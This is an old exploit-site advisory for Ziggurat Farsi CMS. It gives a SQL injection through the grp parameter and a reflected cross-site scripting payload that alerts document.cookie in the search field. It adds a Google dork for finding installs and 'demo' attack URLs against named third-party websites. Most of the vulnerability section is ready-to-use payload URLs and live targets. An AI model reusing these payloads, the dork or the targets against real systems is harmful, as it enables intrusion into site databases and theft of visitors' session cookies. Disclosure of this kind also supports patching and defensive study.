Ziggurat CMS Multiple Vulnerabilities

2010.12.23

Credit: d3c0der

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#########################################################
Ziggurat CMS Multiple Vulnerabilities
---------------------------------------------------------
Portal Name: Ziggurat Farsi CMS
software : http://www.farsi-cms.com
Author : d3c0der - d3c0der@hotmail.com
google dork :  Powered By Ziggurat Farsi CMS
homepage : www.attackerz.ir
spt : netqurd - maarek - l3l4ck.$c0rpi0n  
---------------------------------------------------------


#########################################################
##sql injection
[sqli] :
http://www.[site]/main.asp?id=[id]&grp=[id]' [sqli]

demo :
http://www.sbco.ir/main.asp?id=22&grp=24'  

********          *********         *********

##Cross Site Scripting ( in search )
[xss] :
http://www.[site]/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0

demo :
http://www.sbco.ir/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0

http://zahedan-tebyan.ir/main.asp?id=5&text=<script >alert(document.cookie)</script>&gorooh=0&B1=%D8%A8%DA%AF%D8%B1%D8%AF

---------------------------------
by : d3c0der

#########################################################

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Ziggurat CMS Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Ziggurat CMS Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.